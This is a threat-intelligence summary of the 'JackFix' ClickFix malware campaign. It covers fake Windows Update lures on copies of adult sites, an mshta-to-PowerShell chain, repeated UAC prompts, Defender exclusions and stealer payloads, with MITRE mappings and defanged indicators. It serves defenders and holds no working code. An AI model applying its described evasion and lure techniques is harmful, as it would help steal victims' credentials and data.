Acronis TRU researchers uncovered a novel “JackFix” ClickFix campaign that hijacks the browser to display a convincing full‑screen fake Windows Update prompting victims to run malicious commands. The multistage attack (mshta → PowerShell downloader → final payloads) uses heavy obfuscation, UAC bombardment and a “spray and prey” downloader that executes up to eight payloads including Rhadamanthys and Vidar 2.0, and is detected and blocked by Acronis XDR at the PowerShell stage. #ClickFix #Rhadamanthys
Keypoints
- Novel “JackFix” ClickFix campaign hijacks the browser to show a full‑screen fake Windows Update UI to socially engineer victims into executing attacker commands.
- Initial lures mimic adult websites (xHamster/PornHub clones), likely distributed via malvertising or shady ads/pop‑unders, to pressure users into interacting with the page.
- Attack chain is multistage: mshta initial payload → large/obfuscated PowerShell second stage (loaders or downloaders) → final payloads (up to eight executed per infection).
- Extensive obfuscation: attackers obfuscate both payloads and the ClickFix/clipboard commands (hex arrays, CharCode/Base64, junk code) to evade detection and analysis.
- Privilege escalation via repeated UAC prompts and creation of Microsoft Defender exclusions to allow payloads to run with elevated rights.
- Final payloads include current stealer/RAT families (Rhadamanthys, Vidar 2.0, RedLine, Amadey), and the attackers design C2 endpoints to redirect to benign sites unless accessed via specific PowerShell commands.
MITRE Techniques
- [T1204] User Execution – Social engineering via adult‑site interaction: [‘Any interaction with the site, pressing any of the elements, or anywhere on the site itself, will set the browser to full screen and pop the fake Windows Update screen.’]
- [T1115] Clipboard Data – ClickFix leverages copying data into the clipboard to deliver payloads: [‘…makes these attacks much harder to detect… build the mechanism which copies the payload to the victim’s machine when they first enter the website.’]
- [T1059.001] Command and Scripting Interpreter: PowerShell – Second‑stage scripts are heavy PowerShell loaders/downloaders that fetch and execute payloads: [‘These PowerShell commands would often reach out to a malicious address via the irm or iwr commands, and would pull and execute a second stage.’]
- [T1218] Signed Binary Proxy Execution (mshta / msiexec) – Initial execution frequently uses mshta to run attacker‑controlled HTML/JS pages (and rarely msiexec): [‘The initial payload starts with a mshta command in all but a few variants of the attack.’]
- [T1027] Obfuscated Files or Information – Attackers obfuscate both the payloads and the ClickFix commands (hex arrays, Base64, CharCode, junk code) to evade detection: [‘Unusually, this campaign is not only obfuscating its payloads, but also the commands used to facilitate the ClickFix attack.’]
- [T1548] Abuse Elevation Control Mechanism – The second‑stage script repeatedly prompts UAC to obtain elevated privileges, looping until the user grants admin rights: [‘The script then loops continuously until the victim allows for the script to run as admin.’]
- [T1562.001] Impair Defenses: Disable or Modify Security Tools – Scripts create Microsoft Defender exclusions to allow malware execution: [‘The script begins by attempting to elevate privileges and creating exclusions for Microsoft Defender to allow the malware to run.’]
Indicators of Compromise
- [Domain ] Phishing/hosting/C2 domains used by the campaign – cmevents[.]pro, verificationsbycapcha[.]center, and 27 more domains (e.g., 3accdomain3[.]ru, cosmicpharma-bd[.]com, sportsstories[.]gr).
- [IP ] Infrastructure/C2 addresses – 5[.]129[.]216[.]165, 94[.]74[.]164[.]136, and other attacker IPs used for hosting and payload delivery.
- [File name / extension ] Initial and legacy payload artefacts – .odd files (used to deliver obfuscated JavaScript/PowerShell), pu.swf (vestigial Shockwave Flash component) as observed on phishing sites.
- [Malware / family ] Final payloads observed in infections – Rhadamanthys, Vidar 2.0 (examples), and other families such as RedLine and Amadey (plus loaders/RATs and multiple additional samples executed per infection).